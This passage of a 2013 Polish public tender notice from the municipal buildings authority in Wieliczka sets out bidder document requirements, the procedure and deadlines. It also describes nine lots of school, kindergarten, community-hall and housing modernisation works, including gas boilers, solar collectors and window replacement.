<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Karta tytułowa oferty - sporządzona według formularza stanowiącego Zał. nr 1 do SIWZ.
2. Oświadczenie o udzieleniu 60 miesięcznej gwarancji i rękojmi na wykonane roboty - sporządzone według formularza stanowiącego Zał. nr 6 do SIWZ.
3. Wskazanie tej części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcy - sporządzone według formularza stanowiącego Zał. nr 7 do SIWZ. Niezłożenie załącznika nr 7 do oferty jest rozumiane przez Zamawiającego, że Wykonawca nie powierza żadnej części zamówienia podwykonawcy. 
4. Kosztorys ofertowy sporządzony na podstawie przedmiaru robót stanowiącego załącznik do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty w przypadku (art. 144 ust. 1 uPzp):
a)zmian nazwy, siedziby lub innych danych Wykonawcy lub Zamawiającego,
b)prośby Wykonawcy o udział lub zmianę podwykonawców,
c)zmiany kierownika budowy, w przypadkach uzasadnionych przez Wykonawcę (np. choroba, śmierć, utrata uprawnień, braku przynależności do stosownej Izby),
d)zmiany terminu wykonywania umowy wynikającą z niekorzystnych warunków atmosferycznych
e)zmiany terminu wykonywania umowy wynikającą z przedłużających się procedur administracyjnych (np. związanych z zamówieniami publicznymi, pozyskiwaniem dodatkowych uzgodnień lub decyzji),
f)zmniejszenia ilości zamówienia wynikającego z faktu, iż realizacja tej części stała się dla zamawiającego nieuzasadniona społecznie lub ekonomicznie.
g)zmian technologii lub zastosowania materiałów dokonanych przez Zamawiającego,
h)wszelkich zmian wynikających z konieczności dostosowania warunków już zawartej umowy do nowych uregulowań prawnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wieliczka.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków Komunalnych w Wieliczce, 32-020 Wieliczka, ul. Słowackiego 51, pok. 2c, 3a, tel. (12) 294-91-89,383-09-75 fax. (12) 294-91-89 w godz. 8:00 - 16:00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2013 godzina 11:50, miejsce: Zarząd Budynków Komunalnych w Wieliczce, 32-020 Wieliczka, ul. Słowackiego 51 - pok. 3b.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane ze środków Unii Europejskiej w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013, oś priorytetowa VII Infrastruktura ochrony środowiska.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1 - Modernizacja pawilonu przy ul. Kościuszki 51 w Wieliczce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 - Modernizacja pawilonu przy ul. Kościuszki 51 w Wieliczce.
Przedmiotem zamówienia są roboty budowlane polegające na kontynuacji nadbudowy piętra na całym budynku, zabudowy istniejącego tarasu nad pomieszczeniem apteki a także przystosowanie istniejącej części budynku na cele dziennego ośrodka dla dzieci i młodzieży. Wykonanie klatki schodowej, instalacji wodno-kanalizacyjnej, odgromowej, elektrycznej, wykonanie kotłowni gazowej wraz z przyłączem gazu, wykonanie elewacji i roboty wykończeniowe.

Szczegółowy zakres zadania należy wykonać zgodnie przedmiarem robót, z projektem technicznym oraz Specyfikacją Techniczną Wykonania i Odbioru Robót.
W przypadku podania przez Zamawiającego nazwy lub znaków towarowych dopuszcza się zastosowanie materiałów równoważnych o parametrach nie gorszych niż opisane. Materiały i urządzenia równoważne to takie, które mają te same cechy funkcjonalne co wskazane w dokumentacji konkretne z nazwy lub pochodzenia. Ich jakość i parametry nie mogą być gorsze od jakości określonego w SIWZ materiału lub urządzenia. W przypadku zastosowania (propozycja w ofercie) innych zamienników rynkowych na wykonawcy spoczywa obowiązek udokumentowania (w ofercie), że nie będą one gorsze od wskazanych przez Projektanta, zagwarantują uzyskanie co najmniej tych samych parametrów technicznych oraz posiadać będą niezbędne atesty i dopuszczenia do stosowania wymagane w dokumentacji przetargowej.
Wykonawca wykona przedmiot zamówienia z materiałów własnych. 
W przypadku podania przez Zamawiającego nazwy, norm, aprobat, specyfikacji technicznych i systemów odniesienia lub znaków towarowych dopuszcza się zastosowanie materiałów i rozwiązań równoważnych o parametrach nie gorszych niż opisane.
Zgodnie z zasadami ryczałtowej formy wynagrodzenia, którą jest objęte niniejsze postępowanie, przedmiary robót są dokumentem informacyjno - pomocniczym co oznacza, że co do zasady kosztorys ofertowy ma przy cenie ryczałtowej znaczenie pomocnicze i służy obliczeniu ceny oferty, a nieistotne rozbieżności między jego treścią, a treścią otrzymanych kosztorysów ofertowych nie oznaczają niezgodności oferty z treścią SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.27.00-8, 45.26.28.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2 -Modernizacja budynku Przedszkola nr 2 w Wieliczce oraz modernizacja budynku Gimnazjum im. Kazimierza Wielkiego w Wieliczce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 -Modernizacja budynku Przedszkola nr 2 w Wieliczce oraz modernizacja budynku Gimnazjum im. Kazimierza Wielkiego w Wieliczce 
Przedmiotem zamówienia jest montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką w budynku Przedszkola nr 2 w Wieliczce oraz modernizacja c.o., montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz montaż drzwi przeciwpożarowych, odgrzybienie pow. ścian kotłowni, wykonanie nowych tynków i dwukrotne malowanie w budynku Gimnazjum.

Szczegółowy zakres zadania należy wykonać zgodnie przedmiarem robót, z projektem technicznym oraz Specyfikacją Techniczną Wykonania i Odbioru Robót.
W przypadku podania przez Zamawiającego nazwy lub znaków towarowych dopuszcza się zastosowanie materiałów równoważnych o parametrach nie gorszych niż opisane. Materiały i urządzenia równoważne to takie, które mają te same cechy funkcjonalne co wskazane w dokumentacji konkretne z nazwy lub pochodzenia. Ich jakość i parametry nie mogą być gorsze od jakości określonego w SIWZ materiału lub urządzenia. W przypadku zastosowania (propozycja w ofercie) innych zamienników rynkowych na wykonawcy spoczywa obowiązek udokumentowania (w ofercie), że nie będą one gorsze od wskazanych przez Projektanta, zagwarantują uzyskanie co najmniej tych samych parametrów technicznych oraz posiadać będą niezbędne atesty i dopuszczenia do stosowania wymagane w dokumentacji przetargowej.
Wykonawca wykona przedmiot zamówienia z materiałów własnych. 
W przypadku podania przez Zamawiającego nazwy, norm, aprobat, specyfikacji technicznych i systemów odniesienia lub znaków towarowych dopuszcza się zastosowanie materiałów i rozwiązań równoważnych o parametrach nie gorszych niż opisane.
Zgodnie z zasadami ryczałtowej formy wynagrodzenia, którą jest objęte niniejsze postępowanie, przedmiary robót są dokumentem informacyjno - pomocniczym co oznacza, że co do zasady kosztorys ofertowy ma przy cenie ryczałtowej znaczenie pomocnicze i służy obliczeniu ceny oferty, a nieistotne rozbieżności między jego treścią, a treścią otrzymanych kosztorysów ofertowych nie oznaczają niezgodności oferty z treścią SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 09.33.20.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3- Modernizacja budynku Szkoły Podstawowej nr 2 w Wieliczce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3- Modernizacja budynku Szkoły Podstawowej nr 2 w Wieliczce 
Przedmiotem zamówienia jest modernizacja kotłowni gazowej wraz z armaturą, rurociągami, izolacją oraz automatyką, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz wymiana okien z PCV - 5 komorowe z nawiewnikami i parapetami.

Szczegółowy zakres zadania należy wykonać zgodnie przedmiarem robót, z projektem technicznym oraz Specyfikacją Techniczną Wykonania i Odbioru Robót.
W przypadku podania przez Zamawiającego nazwy lub znaków towarowych dopuszcza się zastosowanie materiałów równoważnych o parametrach nie gorszych niż opisane. Materiały i urządzenia równoważne to takie, które mają te same cechy funkcjonalne co wskazane w dokumentacji konkretne z nazwy lub pochodzenia. Ich jakość i parametry nie mogą być gorsze od jakości określonego w SIWZ materiału lub urządzenia. W przypadku zastosowania (propozycja w ofercie) innych zamienników rynkowych na wykonawcy spoczywa obowiązek udokumentowania (w ofercie), że nie będą one gorsze od wskazanych przez Projektanta, zagwarantują uzyskanie co najmniej tych samych parametrów technicznych oraz posiadać będą niezbędne atesty i dopuszczenia do stosowania wymagane w dokumentacji przetargowej.
Wykonawca wykona przedmiot zamówienia z materiałów własnych. 
W przypadku podania przez Zamawiającego nazwy, norm, aprobat, specyfikacji technicznych i systemów odniesienia lub znaków towarowych dopuszcza się zastosowanie materiałów i rozwiązań równoważnych o parametrach nie gorszych niż opisane.
Zgodnie z zasadami ryczałtowej formy wynagrodzenia, którą jest objęte niniejsze postępowanie, przedmiary robót są dokumentem informacyjno - pomocniczym co oznacza, że co do zasady kosztorys ofertowy ma przy cenie ryczałtowej znaczenie pomocnicze i służy obliczeniu ceny oferty, a nieistotne rozbieżności między jego treścią, a treścią otrzymanych kosztorysów ofertowych nie oznaczają niezgodności oferty z treścią SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 09.33.20.00-5, 45.42.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część 4- Modernizacja budynku Szkoły Podstawowej w Byszycach oraz budynku Szkoły Podstawowej w Janowicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie modernizacji kotłowni gazowej wraz z armaturą, rurociągami, izolacją oraz automatyką, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz wymiana okien z PCV - 5 komorowe z nawiewnikami i parapetami w budynku Szkoły Podstawowej w Byszycach oraz modernizacja kotłowni gazowej wraz z armaturą, rurociągami, izolacją oraz automatyką, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz wymiana okien z PCV - 5 komorowe z nawiewnikami i parapetami w budynku Szkoły Podstawowej w Janowicach.

Szczegółowy zakres zadania należy wykonać zgodnie przedmiarem robót, z projektem technicznym oraz Specyfikacją Techniczną Wykonania i Odbioru Robót.
W przypadku podania przez Zamawiającego nazwy lub znaków towarowych dopuszcza się zastosowanie materiałów równoważnych o parametrach nie gorszych niż opisane. Materiały i urządzenia równoważne to takie, które mają te same cechy funkcjonalne co wskazane w dokumentacji konkretne z nazwy lub pochodzenia. Ich jakość i parametry nie mogą być gorsze od jakości określonego w SIWZ materiału lub urządzenia. W przypadku zastosowania (propozycja w ofercie) innych zamienników rynkowych na wykonawcy spoczywa obowiązek udokumentowania (w ofercie), że nie będą one gorsze od wskazanych przez Projektanta, zagwarantują uzyskanie co najmniej tych samych parametrów technicznych oraz posiadać będą niezbędne atesty i dopuszczenia do stosowania wymagane w dokumentacji przetargowej.
Wykonawca wykona przedmiot zamówienia z materiałów własnych. 
W przypadku podania przez Zamawiającego nazwy, norm, aprobat, specyfikacji technicznych i systemów odniesienia lub znaków towarowych dopuszcza się zastosowanie materiałów i rozwiązań równoważnych o parametrach nie gorszych niż opisane.
Zgodnie z zasadami ryczałtowej formy wynagrodzenia, którą jest objęte niniejsze postępowanie, przedmiary robót są dokumentem informacyjno - pomocniczym co oznacza, że co do zasady kosztorys ofertowy ma przy cenie ryczałtowej znaczenie pomocnicze i służy obliczeniu ceny oferty, a nieistotne rozbieżności między jego treścią, a treścią otrzymanych kosztorysów ofertowych nie oznaczają niezgodności oferty z treścią SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 09.33.20.00-5, 45.42.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część 5- Modernizacja budynku Szkoły Podstawowej w Mietniowie, modernizacja budynku Szkoły Podstawowej w Pawlikowicach oraz modernizacja budynku Domu Ludowego w Pawlikowicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 5- Modernizacja budynku Szkoły Podstawowej w Mietniowie, modernizacja budynku Szkoły Podstawowej w Pawlikowicach oraz modernizacja budynku Domu Ludowego w Pawlikowicach
Przedmiotem zamówienia jest: 
modernizacja c.o. wraz z armaturą, rurociągami, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz montaż drzwi stalowych przeciwpożarowych, odgrzybianie, 2-krotne malowanie ścian sufitów w budynku Szkoły Podstawowej w Mietniowie,
modernizacja instalacji c.o. w tym montaż rurociągów, montaż grzejników, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz odgrzybianie ścian, ułożenie posadzki z płytek, licowanie ścian płytkami w budynku Szkoły Podstawowej w Pawlikowicach,
modernizacja kotłowni w tym montaż kotła gazowego wraz z armaturą, rurociągami, izolacją oraz automatyką, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz wymiana okien z PCV - 5 komorowe z nawiewnikami i parapetami, ocieplenie stropu, wykonanie tynków wewnętrznych, wykonanie i montaż zadaszenia wejścia do kotłowni w budynku Domu Ludowego w Pawlikowicach.

Szczegółowy zakres zadania należy wykonać zgodnie przedmiarem robót, z projektem technicznym oraz Specyfikacją Techniczną Wykonania i Odbioru Robót.
W przypadku podania przez Zamawiającego nazwy lub znaków towarowych dopuszcza się zastosowanie materiałów równoważnych o parametrach nie gorszych niż opisane. Materiały i urządzenia równoważne to takie, które mają te same cechy funkcjonalne co wskazane w dokumentacji konkretne z nazwy lub pochodzenia. Ich jakość i parametry nie mogą być gorsze od jakości określonego w SIWZ materiału lub urządzenia. W przypadku zastosowania (propozycja w ofercie) innych zamienników rynkowych na wykonawcy spoczywa obowiązek udokumentowania (w ofercie), że nie będą one gorsze od wskazanych przez Projektanta, zagwarantują uzyskanie co najmniej tych samych parametrów technicznych oraz posiadać będą niezbędne atesty i dopuszczenia do stosowania wymagane w dokumentacji przetargowej.
Wykonawca wykona przedmiot zamówienia z materiałów własnych. 
W przypadku podania przez Zamawiającego nazwy, norm, aprobat, specyfikacji technicznych i systemów odniesienia lub znaków towarowych dopuszcza się zastosowanie materiałów i rozwiązań równoważnych o parametrach nie gorszych niż opisane.
Zgodnie z zasadami ryczałtowej formy wynagrodzenia, którą jest objęte niniejsze postępowanie, przedmiary robót są dokumentem informacyjno - pomocniczym co oznacza, że co do zasady kosztorys ofertowy ma przy cenie ryczałtowej znaczenie pomocnicze i służy obliczeniu ceny oferty, a nieistotne rozbieżności między jego treścią, a treścią otrzymanych kosztorysów ofertowych nie oznaczają niezgodności oferty z treścią SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 09.33.20.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część 6- Modernizacja budynku Gimnazjum w Dobranowicach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 6- Modernizacja budynku Gimnazjum w Dobranowicach.
Przedmiotem zamówienia jest wykonanie modernizacji c.o. w tym montaż kotłowni gazowej wraz z armaturą, rurociągami, izolacją oraz automatyką, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz montaż drzwi stalowych przeciwpożarowych, wymiana stolarki okiennej z PCV 5-komorowe z nawiewnikami wraz z parapetami, licowanie ścian płytkami, wykonanie tynków.

Szczegółowy zakres zadania należy wykonać zgodnie przedmiarem robót, z projektem technicznym oraz Specyfikacją Techniczną Wykonania i Odbioru Robót.
W przypadku podania przez Zamawiającego nazwy lub znaków towarowych dopuszcza się zastosowanie materiałów równoważnych o parametrach nie gorszych niż opisane. Materiały i urządzenia równoważne to takie, które mają te same cechy funkcjonalne co wskazane w dokumentacji konkretne z nazwy lub pochodzenia. Ich jakość i parametry nie mogą być gorsze od jakości określonego w SIWZ materiału lub urządzenia. W przypadku zastosowania (propozycja w ofercie) innych zamienników rynkowych na wykonawcy spoczywa obowiązek udokumentowania (w ofercie), że nie będą one gorsze od wskazanych przez Projektanta, zagwarantują uzyskanie co najmniej tych samych parametrów technicznych oraz posiadać będą niezbędne atesty i dopuszczenia do stosowania wymagane w dokumentacji przetargowej.
Wykonawca wykona przedmiot zamówienia z materiałów własnych. 
W przypadku podania przez Zamawiającego nazwy, norm, aprobat, specyfikacji technicznych i systemów odniesienia lub znaków towarowych dopuszcza się zastosowanie materiałów i rozwiązań równoważnych o parametrach nie gorszych niż opisane.
Zgodnie z zasadami ryczałtowej formy wynagrodzenia, którą jest objęte niniejsze postępowanie, przedmiary robót są dokumentem informacyjno - pomocniczym co oznacza, że co do zasady kosztorys ofertowy ma przy cenie ryczałtowej znaczenie pomocnicze i służy obliczeniu ceny oferty, a nieistotne rozbieżności między jego treścią, a treścią otrzymanych kosztorysów ofertowych nie oznaczają niezgodności oferty z treścią SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 09.33.20.00-5, 45.42.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część 7- Modernizacja budynku Szkoły Podstawowej w Sygneczowie oraz budynku Szkoły Podstawowej w Raciborsku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 7- Modernizacja budynku Szkoły Podstawowej w Sygneczowie oraz budynku Szkoły Podstawowej w Raciborsku.
Przedmiotem zamówienia jest:
modernizacja kotłowni w tym montaż kotła gazowego wraz z armaturą, rurociągami, izolacją oraz automatyką, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz montaż drzwi stalowych przeciwpożarowych w budynku Szkoły Podstawowej w Sygneczowie
modernizacja instalacji c.o. w tym montaż rurociągów, montaż grzejników wraz z armaturą i automatyką, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz wymiana stolarki okiennej PCV 5 - komorowe z nawiewnikami, licowanie ścian płytkami, ocieplenie dachu, wykonanie zadaszenia nad wejściem w budynku Szkoły Podstawowej w Raciborsku.

Szczegółowy zakres zadania należy wykonać zgodnie przedmiarem robót, z projektem technicznym oraz Specyfikacją Techniczną Wykonania i Odbioru Robót.
W przypadku podania przez Zamawiającego nazwy lub znaków towarowych dopuszcza się zastosowanie materiałów równoważnych o parametrach nie gorszych niż opisane. Materiały i urządzenia równoważne to takie, które mają te same cechy funkcjonalne co wskazane w dokumentacji konkretne z nazwy lub pochodzenia. Ich jakość i parametry nie mogą być gorsze od jakości określonego w SIWZ materiału lub urządzenia. W przypadku zastosowania (propozycja w ofercie) innych zamienników rynkowych na wykonawcy spoczywa obowiązek udokumentowania (w ofercie), że nie będą one gorsze od wskazanych przez Projektanta, zagwarantują uzyskanie co najmniej tych samych parametrów technicznych oraz posiadać będą niezbędne atesty i dopuszczenia do stosowania wymagane w dokumentacji przetargowej.
Wykonawca wykona przedmiot zamówienia z materiałów własnych. 
W przypadku podania przez Zamawiającego nazwy, norm, aprobat, specyfikacji technicznych i systemów odniesienia lub znaków towarowych dopuszcza się zastosowanie materiałów i rozwiązań równoważnych o parametrach nie gorszych niż opisane.
Zgodnie z zasadami ryczałtowej formy wynagrodzenia, którą jest objęte niniejsze postępowanie, przedmiary robót są dokumentem informacyjno - pomocniczym co oznacza, że co do zasady kosztorys ofertowy ma przy cenie ryczałtowej znaczenie pomocnicze i służy obliczeniu ceny oferty, a nieistotne rozbieżności między jego treścią, a treścią otrzymanych kosztorysów ofertowych nie oznaczają niezgodności oferty z treścią SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 09.33.20.00-5, 45.42.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Część 8- Modernizacja budynku Domu Ludowego w Małej Wsi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 8- Modernizacja budynku Domu Ludowego w Małej Wsi.
Przedmiotem zamówienia jest wykonanie modernizacji c.o. w tym montaż kotłowni gazowej wraz z armaturą, rurociągami, izolacją oraz automatyką, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz montaż drzwi aluminiowych, wymiana stolarki okiennej z PCV 5-komorowe z nawiewnikami wraz z parapetami, pokrycie dachu płytami - papa termozgrzewalna z warstwą styropianu, ocieplenie kominów.

Szczegółowy zakres zadania należy wykonać zgodnie przedmiarem robót, z projektem technicznym oraz Specyfikacją Techniczną Wykonania i Odbioru Robót.
W przypadku podania przez Zamawiającego nazwy lub znaków towarowych dopuszcza się zastosowanie materiałów równoważnych o parametrach nie gorszych niż opisane. Materiały i urządzenia równoważne to takie, które mają te same cechy funkcjonalne co wskazane w dokumentacji konkretne z nazwy lub pochodzenia. Ich jakość i parametry nie mogą być gorsze od jakości określonego w SIWZ materiału lub urządzenia. W przypadku zastosowania (propozycja w ofercie) innych zamienników rynkowych na wykonawcy spoczywa obowiązek udokumentowania (w ofercie), że nie będą one gorsze od wskazanych przez Projektanta, zagwarantują uzyskanie co najmniej tych samych parametrów technicznych oraz posiadać będą niezbędne atesty i dopuszczenia do stosowania wymagane w dokumentacji przetargowej.
Wykonawca wykona przedmiot zamówienia z materiałów własnych. 
W przypadku podania przez Zamawiającego nazwy, norm, aprobat, specyfikacji technicznych i systemów odniesienia lub znaków towarowych dopuszcza się zastosowanie materiałów i rozwiązań równoważnych o parametrach nie gorszych niż opisane.
Zgodnie z zasadami ryczałtowej formy wynagrodzenia, którą jest objęte niniejsze postępowanie, przedmiary robót są dokumentem informacyjno - pomocniczym co oznacza, że co do zasady kosztorys ofertowy ma przy cenie ryczałtowej znaczenie pomocnicze i służy obliczeniu ceny oferty, a nieistotne rozbieżności między jego treścią, a treścią otrzymanych kosztorysów ofertowych nie oznaczają niezgodności oferty z treścią SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 09.33.20.00-5, 45.42.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Część 9  - Modernizacja budynku mieszkalnego wielorodzinnego w Wieliczce ul. Krakowska 35..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 9  - Modernizacja budynku mieszkalnego wielorodzinnego w Wieliczce ul. Krakowska 35.
Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu przebudowy istniejącego nie użytkowego strychu na mieszkania (6 mieszkań), przebudowa kotłowni węglowej na gazową, wykonanie przyłącza gazowego, wykonanie elewacji oraz prac wykończeniowych.
Szczegółowy zakres zadania należy wykonać zgodnie przedmiarem robót, z projektem technicznym oraz Specyfikacją Techniczną Wykonania i Odbioru Robót.
